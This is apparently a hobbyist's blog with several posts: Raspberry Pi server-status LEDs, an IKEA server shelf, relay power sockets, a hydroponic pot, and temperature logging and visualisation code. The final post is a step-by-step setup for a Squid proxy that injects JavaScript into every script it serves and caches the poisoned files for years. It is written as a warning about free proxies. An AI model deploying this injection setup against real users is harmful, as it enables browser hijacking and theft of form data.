Raspberry Pi controlled LEDs that tell me if a server is offline

A friend of mine who is also a sysadmin recently said to me that if a device he managed went offline, red alarm lights went off in his office.

He meant it as a figure of speech but I thought that would actually be an awesome addition for my server shelf so I would know if there is a problem with the server or one of its virtual machines.
I bought a roll of RGB LED strips from Amazon and connected them to a few relays that were controlled by  a simple ping script on my raspberry pi.

Here is how it looks:

Cut LED strip that is mounted above Server 2

Strip in front of Server 1
Cable management is yet to come

This is how it looks if Server 1 has an error but Server 2 is fine. Only after I installed it I realized that the red LEDs are much weaker than the green ones. But it's okay and you can see if fine even if the sun shines in.

One offline, the other one online

Both are online

Here are my schematics:

And the breadboard schematics:

IKEA Server Rack (nope not that LACK thing)

I moved recently and had the most geeky problem there is: Where do I put my servers and the coffee maker?

I've read a lot of things about Lack Racks, where people use the 7€ LACK table from IKEA to mount rackmountable servers.

But since I have neither a rackmountable server nor the table at home I had to think of something else to house my two servers.

I did however have an old KALLAX (former EXPIDIT) shelf and this is how I built it:

For the impatient here is the final result:

And here is how I made it:

Cable management

For cable management I was using pipe holders since they are much cheaper than any solution that had "cable" or "management" in their names. These are about 4 Cents (€ cents) a piece (2€ for a bag of 22 pieces). I mounted them with one screw per holder because this way I'm able to add/remove cables without needing to unscrew the whole thing.

Rack on roller skates

Since I know I have to change cables every now and then I felt the need to mount some kind of rolls to the bottom of the rack so I can move it easily without any danger to the servers. So I picked up a few furniture rollers and mounted them with some screws

Modem and router

I've been provided a Thompson modem/router from my ISP. This thing really really sucks so I bought an additional router and configured the modem to be just a modem and let my router do all the routing :D

I installed the modem sideways in the lowest segment so I can easily check the LEDs and reset it if it doesn't do what it's told.

Since my Linksys router is also my AP I mounted it on the top left side of the self

Fitting the Servers

Here you can see the pipe holders with one screw each. I've but the NAS in for fitting

And added the power cables and the Xeon server

The Switch

To connect all devices I bought a Cisco 8 port Gigabit smart switch that can be mounted nicely next to the Xeon server.

At this point I realized that the switch's power cable has to be connected on it's side. Nope.. not the side facing down -.-

Much better here!

The pipe holders are doing their job like they've never done anything else in their lifes!

The finished server shelf

The coffee maker fits in place perfectly and since it's not used very often I don't think the steam will affect any of the servers.

Let me know, what you think about this project!

Raspberry Pi controlled power sockets - It's pretty easy

Ever since I started working on small projects with my raspberries I wanted to control something bigger than an LED. I played around with relays for some time but I always cut the cable (eg from a lamp) and connect the power line through the relay but for that I had to cut (and uglify) a stock cable.

A friend got me the idea of simply connecting a power socket to the relay so I can plug in what ever I want withoug having to modify it.

So I've built it and mounted everything on a piece of wood.

I used:

• 3 Power sockets for 2€ each
• a Power cable to power the sockets for 2€
• an 8 port relay board for 6€
• Since my female jumper cables I ordered a week ago didn't arrive yet I used some other wires

The base components screwed on a piece of wood

The power sockets are connected

All connected and ready to go.
This just just a proof of concept, if it works out I'll build it in a nicer (and safer) case

The last step was the software. I used the php-gpio library and built a simple webpage so I can control the sockets from my phone (or PC)

I connected my self made plant-shelf and a small fan to the sockets to the power sockets and gave it a try.

Here you can see it in action

DIY hydroponic pot for about 36€

So this is my first non-IT post on my blog and I hope it will help somebody save a few bucks.

One of my hobbies besides programming and teaching is gardening. I recently bought a hydroponic pot that automatically waters the plant for about 60€ and it worked amazingly well with lettuce:

But since it uses a very simple principal I thought 60€ are a bit much for that so I decided to make my own.

Thanks to my awesome Gimp 2.8 skills I was able to produce this paint-like schematic of what I'm going to build and how it should work:

There are actually two possible solutions for transporting the water to the surface. I chose a water pump but it would work equally well with a small aquarium-air pump that would be connected to the hose aboth the water level.

You'll need those things:

• A planter (pot without holes)
• A smaller flower pot that should not touch the ground of the planter - I used a flower bowl (didn't even know those things existed)
• 1m garden/aquarium hose
• 1 T-piece for the hose
• An aquarium water pump
• Hydroballs

I picked up everything for 36€ (about 49$)

These are european prices btw so in the US the parts should be much cheaper. It probably will cost you only 30 bucks or so

Enough of the theory.. let's build it!

All the parts

I had to drill some small holes in the bottom fot the water
and a bigger one for the hose

The bowl fits and the hose seems also pretty tight

Attach a short piece of hose to the pump

and put it under the bowl in the pot

Form a ring from some hose and make small holes in it

Stick it on the bowl-hose

Put the soil in and in my case a small pumpkin and we're finished

The plants really seem to love this kind of pot as you can see in the first pic of the lettuce. The last picture shows the young pumpkin plant. A few days later under fluorescent lights it looked like this:

I'll try to make a few more of them. Maybe I'll be able to make a cheaper or more effective version of this pot.

Visualizing the temperature from 6 months

In my last project I used a Raspberry Pi and a few temperature sensors to record the temperature from the inside and outside of my flat.

While I saw the csv files fill up over the months I tried to find a good use for the data. At first I was looking for private weather clusters where people can contribute local (up to date) temperature data but I didn't find a page like that.

I also tried to code a temperature prediction algorithm that could tell me how the weather will develop but that would need years of data and I only got a few months.

So I went another way: I made a HTML5 canvas page that visualized the data and colored it from blue (cold) to red (hot)

This "sunset" was the result:

This sunset is made out of small boxes where every box stands for a measured temperature. Note that this is actually a 2D representation of 1 dimensional data (it should be a long line but is rendered as 2D. The color of the box is calculated by a temperature scale. At first the script looks for the lowest and the highest temperatures and uses them as scale for every temperature and calculates the color. The size of every box is calculated by how many temperature entries there are and how big your screen is.

You can really see the heatweave in the beginning (July and August) and even in the heat you can see when it started raining (the colder boxes).

A fun thing I can do is tell the script how detailed it should render. The picture above is rendered with a detail of 10 (which actually means just that I just use every 10th temperature to create a box)

The following render has a detail of 100 but even though it has a lower detail value you can see day/night cycles much better.

In comparison detail 1 (the highest detail level) has too much information to be readable

And just for fun the inside temperature rendered in detail 10. Note that the temperature scale for this is different. Red and blue don't mean the same temperatures as in the outside temperature graph since the color levels are calculated by lowest/highest from the data at hand.

You can find the live version here. You can click on any box on the screen and it will show you when it was and what the temperature was. It also has to process the big csv file which is why it could take a few seconds to load.

For the geeks:

The color calculation function

function getColor(temperature)
{
 var t = warmest+coldest; //warmest and coldest were set at loading
 var red = (255 * (temperature / t));
 var green = 0;
 var blue = 255 - (255 * (temperature / t));

 return 'rgb(' + Math.round(red) + ',' + Math.round(green) + ',' + Math.round(blue) + ')'; 
}

Raspberry Pi temperature monitor and graph with live updates

After my Raspberry Pi powered door alarm I thought about implementing a temperature monitoring system with the Raspberry. I just found out about 1wire support on the Raspberry Pi a few weeks ago and wanted to try it myself.

After you've finished this tutorial you'll have a cheap temperature monitoring Raspberry pi with a nice zoomable, live updating web UI with as many sensors as you wish and even from remote networks like this (german):

You'll need these hardware components (if you make it like I did):

1. A Raspberry Pi (duh)
I use a standard raspbian and with just 3 commands you're ready for reading 1wire sensors (more on that later)

2. Temperature sensor

I bought a 1 wire temperature sensor for about 5€. Although 1 wire is not really true. It has 3 wires but the data uses just one wire.
I bought this one (sheet in german) which has a DS18S20 sensor inside.










3. One 4.7k Ohm resistor

We'll be needing this to keep our raspberry GPIO ports from frying










4. One screw terminal with 3 pins

I'm using this because it's the easiest way to re-use cables and sensors because they don't have to be soldered.

Let's build it!

This will actually be the shortest part. Since I'm using the screw terminal all we'll need to do is solder (or connect somehow) the resistor between the left and center terminal like this:

The second and last part of the building process is to connect the raspberry and the sensor to the terminal.

(GPIO Pin numbers acording to this graph, "=>" means connect to)

GPIO 1 => +3.3V on the Terminal

GPIO 6 => GND on the Terminal

GPIO 7 => DATA on the Terminal

+ Wire of the sensor => +3.3V on the Terminal

- Wire of the sensor => GND on the Terminal

DATA wire of the sensor => DATA on the Terminal

The hardware is now ready!

Now let's log into our Raspberry Pi!

First we'll have to tell the kernel that we'll be using the 1 wire communication. We do this by editing (as root) /etc/modules and adding the following lines:

wire
w1_gpio
w1_therm

After a restart we check if the sensor was found

ls /sys/bus/w1/devices

You should see something like this:

If you only see the w1_bus_master1 folder that means your sensor was not recognised by the system. Check your wires and if you connected the + and - cables correctly.

If you see another folder (in my case it's 10-00080224e359) you're ready to get data from your sensor!
Every sensor has a different ID so yours will be different from mine! Keep that in mind when you copy the commands!

Next lets see if it's really working by reading the w1_slave file inside your sensors directory:

cat /sys/bus/w1/devices/10-00080224e359/w1_slave

The temperature is right in this file at t=28750 which means 28.750°C (damn you, heatwave)

Congratulations! You can now log your temperature inside or outside (or even in water if your sensor is water proof)

But I didn't stop there

I wanted to create a website which displays all the info and logs the sensor as well as the CPU temperature.

But I didn't want to rely on the raspberry as a webserver rather than just a node that sends it's info to another server like this:

This way I could still see historic data without killing the Raspberry's SD card slowly.

This is the script (it's written in PHP ran in php5_cli.. don't judge me I'm a web developer :D) that runs on the Raspberry, checks the CPU and sensor temperature every 60 seconds and then sends it to a server script (more on that later)

Script: read_sensors.php
You might want to change two things: The device ID of your temperature sensor and the IP and folder of your Webserver

<?php
$webserver_ip_and_port = 'http://192.168.1.115/temperatur/';
$device_id = '10-00080224e359';
$cputemp = "/sys/class/thermal/thermal_zone0/temp";
$wiretemp = "/sys/bus/w1/devices/'.$device_id.'/w1_slave";

$data = array();

while(1)
{
  $data = file($wiretemp);
  $data = explode('t=',$data[1]);
  $wtemp = $data[1]/1000;
  $ctemp = implode(file($cputemp))/1000;

  $tdata = array('CPU'=>$ctemp,'room'=>$wtemp);
  echo "CPU: $ctemp\nRoommtemp: $wtemp\n";

  $null = file($webserver_ip_and_port."get.php?data=".rawurlencode(json_encode($tdata)));
  sleep(60);
}

This script should be executed with the command "php read_sensors.php". You'll need to have the package php5_cli installed.

Good so our raspberry can read the temperature and sends it to another server.

The server setup is pretty straight forward since you only have to push the webserver folder from this repository I made on your webspace and you're finished! The code I wrote features a backend API where the script looks every minute for changes and if your monitoring computer is disconnected for a few minutes and then reconnects it will update all the data that you've missed because of the disconnect.

Please let me know what you think and if you have any questions I'll be happy to answer them :D

Why free proxies are free - The JS infection conspiracy

I recently stumbled across a presentation of Chema Alonso from the Defcon 20 Conference where he was talking about how he created a Javascript botnet from scratch and how he used it to find scammers and hackers.

Everything is done via a stock SQUID proxy with small config changes.

The idea is pretty simple:

1. [Server] Install Squid on a linux server
2. [Payload] Modify the server so all transmitted javascript files will get one extra piece of code that does things like send all data entered in forms to your server
3. [Cache] Set the caching time of the modified .js files as high as possible

In the presentation Chema said he posted the IP of the modified server on the web and after a few days there were over 5000 people using his proxy.

Most people used it for bad things because everyone knows you're only anonymous in the web when you've got a proxy and it looks like many people don't think that the proxy could do something bad to them.

I wondered if it really is that simple so I took a VM running Debian and tried implementing the concept myself.

Make your own js infecting proxy

I assume that you have a squid proxy running and also you'll need a webserver like Apache using /var/www as web root directory (which is the default)

1. Creating the payload

For the payload I'll use a simple script that takes all links of a webpage and rewrites the href (link) attribute to my site.

/etc/squid/payload.js

for(var i=0;i<document.getElementsByTagName('a').length;i++)
    document.getElementsByTagName('a')[i].href = "http://blog.chr1s.at";

2. Creating the script that poisons the originally requested js file

/etc/squid/poison.pl

#!/usr/bin/perl

$|=1;
$count = 0;
$pid = $$;

while(<>)
{
  chomp $_;
  if($_ =- /(.*\.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
  }
  else
  {
        print "$_\n";
  }
$count++;
}

This script uses wget to retrieve the original javascript file of the page the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which contains our payload now) will be sent to the client.

You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored.

3. Adding the perl script to the Squid config

in /etc/squid/squid.conf add

url_rewrite_program /etc/squid/poison.pl

This basically tells squid to pass all requested file names to the poison.pl script so it can look for js files.

4. Changing cache duration of all cached js files

/var/www/tmp/.htaccess

ExpiresActive On
ExpiresDefault "access plus 3000 days"

These lines tell the apache server to give it an insanely long expiration(caching) time so it will be in the browser of the user until they're cleaning their cookies/caches

That's it!

One more restart of squid and you're good to go. If you're connecting to the proxy and try to surf on any webpage, the page will be displayed as expected but all links will lead to this blog.

The sneaky thing about this technique is that even when somebody disconnects from the proxy the cached js files will most likely be still in their caches.

In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy but with creative payloads all sorts of things could be implemented.

Tell your friends never to use free proxies because many hosts do things like that.

Be safe on the web (but not with free proxies)